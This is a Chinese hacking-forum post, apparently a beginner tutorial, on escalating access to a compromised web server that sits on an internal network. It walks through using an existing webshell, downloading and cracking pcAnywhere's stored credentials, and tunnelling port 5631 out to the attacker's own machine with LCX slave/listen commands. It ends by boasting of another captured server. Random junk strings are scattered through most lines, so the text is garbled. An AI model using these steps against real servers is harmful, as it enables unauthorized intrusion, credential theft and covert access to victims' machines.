- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。" B; z! J" ?6 f1 @; i% R
! }5 A8 }! _7 f6 d% [3 X$ Q提权方法:pcanywhere+LCX% r# P" r! J" \2 Q; q% N- @* ^
) O( H( R7 X+ |% R, G4 `$ r% I- \获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
+ I; |. ?; ^+ Q, m) Z* ?( }
# i- x) D* w ^5 W4 w/ o+ R在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。. g) ]" [2 g( k0 W
! C" k9 c0 u( f1 e+ P
" f5 K) n5 p2 f0 v- o7 w3 o3 v
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
: B. g, k; B7 C7 W2 S! L2 }
. G; q: G7 i6 ^* F/ Z% \
' ~' O* ]! A& T/ G& c# S4 J* I呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。# m( A H9 d1 g
' o. X5 C! d; _4 p9 L
& o+ \- H5 F9 {/ d3 {( B" k. v) C8 f+ J$ l5 f0 l
, B5 p9 b1 k" h, q- s& ]) L% n2 j
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
" g$ W% @( `/ y5 B3 A/ l1 }1 \
. d- s7 H2 c, z9 r7 s7 h, e
& @: s: k- e N; Z5 ALCX的用法再简单说下:3 C! R g' {6 T
i4 x; s: N& C* c; U9 }& ^2 D
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)4 G, K4 P. v& @& w' U. T5 l# x8 o
, n8 S: m7 U# J8 W# x" s
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
: o; ^: L& Q, M) c) w! a( d4 g. A# f9 v% p5 u- x+ N
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。, o& w8 u9 g: a* J$ r3 l S* O2 a
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
( f2 W8 Z J( l: j; A+ ~' ^+ B
0 I- ^3 t% Z: }; K/ J
9 J( @0 U( D: \' Y$ V- n+ ]# z0 T ?
z% b F/ [6 E) L W+ D) E
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。; v! U6 A5 F4 | u& H
9 z" B) F; G: r4 E7 _5 E* I
: M, K2 m& j, X! L( w
2 @: Z0 S0 e$ p, f8 `. `; |6 ~" t8 l% P5 d3 {% e. I
我们本地连接试试,输入我们刚破解的账号密码
' W8 }% Q9 R2 |& j$ J2 p9 w) }$ z( X' ?: X. }
2 t4 Y F6 `% p8 ?4 G呵呵``连接成功,服务器不错,又一个8核^︵^
: ]+ o R$ s7 l1 J' Q$ N! d% W# n2 S7 ?1 _# x. K, D" c5 V
% N1 Y2 \2 _( G' G# o: m2 L) m# m$ b' e# _* r
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|